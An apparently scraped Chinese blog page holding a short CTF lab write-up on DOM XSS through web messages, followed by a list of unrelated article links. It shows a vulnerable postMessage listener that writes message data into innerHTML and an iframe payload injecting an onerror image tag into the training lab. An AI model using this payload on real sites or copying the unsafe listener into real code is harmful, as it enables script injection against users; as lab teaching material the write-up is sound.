当前位置: 首页 > news >正文

CTF-WEB: 利用Web消息造成DOM XSS

news 2025/6/19 21:08:11

如果索引中有类似如下代码

<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>window.addEventListener('message', function(e) {document.getElementById('ads').innerHTML = e.data;});
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

http://www.lryc.cn/news/535399.html

相关文章:

  • 【通俗易懂说模型】一篇弄懂几个经典CNN图像模型(AlexNet、VGGNet、ResNet)
  • Unity世界坐标转成UI坐标
  • 自制游戏——斗罗大陆
  • MindStudio制作MindSpore TBE算子(四)算子测试(ST测试-Ascend910B/ModelArts)--失败尝试
  • 二、交换机的vlan子设备接入
  • EFCore相关知识分享
  • 检测网络安全漏洞 工具 网络安全 漏洞扫描 实验
  • deepseek + kimi 高效生成PPT
  • JavaWeb学习-Mybatis(增删改查)
  • 软考高项(二十四)法律法规和标准规范 ★重点集萃★
  • Django中select_related 的作用
  • vscode无法ssh连接远程机器解决方案
  • 计算机组成原理——中央处理器(九)
  • 网页版贪吃蛇小游戏开发HTML实现附源码!
  • 基于java ssm springboot选课推荐交流平台系统设计和实现
  • Sigma-Aldrich化学品安全技术说明书(SDS)查询教程
  • 嵌入式实训室解决方案(2025年最新版)
  • Spring Cloud — 深入了解Eureka、Ribbon及Feign
  • 全排列(力扣46)
  • Mac部署Jenkins 一
  • 附录1:组维英文简写大全
  • SQL Server:查看内存使用情况
  • chrome-mojo C++ Bindings API
  • uniapp + vite + 使用多个 ui 库
  • Unity3D 制作动画的时间轴管理方案: Timeline编
  • 逻辑回归不能解决非线性问题,而svm可以解决
  • Prompt通用技巧1
  • C# 上位机--枚举
  • 01docker run
  • 易语言.飞扬特性展示2